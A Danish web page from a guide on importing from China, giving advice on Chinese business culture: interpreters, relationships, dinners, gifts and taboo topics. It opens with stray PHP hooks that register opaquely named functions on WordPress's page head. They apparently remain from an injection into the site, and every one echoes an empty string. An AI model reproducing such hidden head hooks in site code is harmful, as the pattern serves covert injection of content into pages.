add_action("wp_head", "wpinfoaj2"); function wpinfoaj2(){ echo ""; } add_action("wp_head", "wpinfoaj5"); function wpinfoaj5(){ echo ""; } add_action("wp_head", "wpinfoaj6"); function wpinfoaj6(){ echo ""; }add_action("wp_head", "wpinfoaj1"); function wpinfoaj1(){ echo ""; }

Kinesisk forretningskultur | Kina Import Guiden
Kina Import Guiden - Kina Import Guiden – om at importere fra Kina, handel med Kina og produktion i Kina. Læs her inden du starter en kina butik eller webshop med kina varer.

Kinesisk forretningskultur

Med mindre du snakker kinesisk, så anbefales det at hyre en tolk, når du skal mødes med et kinesisk firma eller en kinesisk fabrik. Langt de fleste i Kina snakker og forstår nemlig ikke Engelsk, så derfor er det en nødvendighed med en tolk, hvis du ikke snakker kinesisk. Men fordi alle udlændinge som kommer til Kina har brug for en tolk, så findes der utrolig mange tolke. Du finder både de erfarne tolke, som kan både Engelsk, Tysk og Kinesisk, og der er mange studerende, som også arbejder som tolk i fritiden. Derfor kan du både finde tolke som beder om en løn på 100-300 kr i timen, helt ned til nogen der vil blive glade for 30-50 kr i timen.

Pas på!
Det svære ved at finde en god tolk, hænger ikke sammen med prisen. Netop fordi udlændinge som kommer til Kina, er så afhængige af en tolk, er der en del tolke, som har fundet ud af at snøre udlændingen. I sådan et tilfælde kan tolken gå bag om ryggen på udlændingen, som har ansat hende/ham og bede fabrikken om en betaling, hvis tolken “oversætter” positivt om fabrikken og derved hjælper fabrikken, med at få udlændingen som ny kunde.

Det gode forhold
“Det gode forhold” er vigtigt når man gør forretning i Kina, især hvis du ønsker et længerevarende samarbejde og lave priser samt høj kvalitet. Kineserne generelt set, sætter pris på gode relationer og anbefalinger, så hvis du kender nogen i Kina, så brug den kontakt, til at blive sat i kontakt med en relevant fabrik, hvor du derved automatisk vil få et bedre tilbud, fordi “du kender nogen, som kender nogen”. Kontakter er alt i Kina.

Forretningskontakter er mere uformelle i Kina end vi ofte ser i Danmark, for eksempel snakker man ofte personlige ting til forretningsmøder, som ofte foregår på en restaurant istedet for et kontor. Der er også ofte meget mad og meget øl og spiritus involveret i forretningsmøder, så man kan komme tæt ind på livet af hinanden og hygge sig sammen. Det anses ofte som uhøfligt, at takke nej til alkohol og cigaretter, så vær forberedt på en hel del alkohol og flere pakker cigaretter i løbet af sådan en forretningsmiddag. Og hvis der slet ikke bliver snakket forretning under mødet, så er det slet ikke underligt. Forretningsdetaljerne skal nok komme på plads senere.

Ofte er gaver også en god ide, altså gaver til den forretningsforbindelse, som man gerne vil pleje forholdet til, og forretningsforbindelser, som man enten på nuværende tidspunkt eller senere, gerne vil have noget ud af.

Tabu
Der er enkelte tabu emner, som kan være gode at vide, inden du begivder dig afsted til et forretningsmøde i Kina:

1. Du må IKKE nævne, at Taiwan er en selvstændig stat.
2. Du skal IKKE på nogen måde rose japanere.
3. Undgå at kritisere Mao Tse Tung og Deng Shiao Ping.
4. Undgå at rose Shanghai foran indfødte Beijingnesere og undgå rose Beijing foran Shanghainesere.

Og husk på at når du modtager visitkort og giver visitkort, som ofte er starten på ethvert møde med en kineser, så bruges begge hænder, som tegn på respekt.

Virk desuden ikke for frembrusende eller dominerende, og så skal du nok klare det.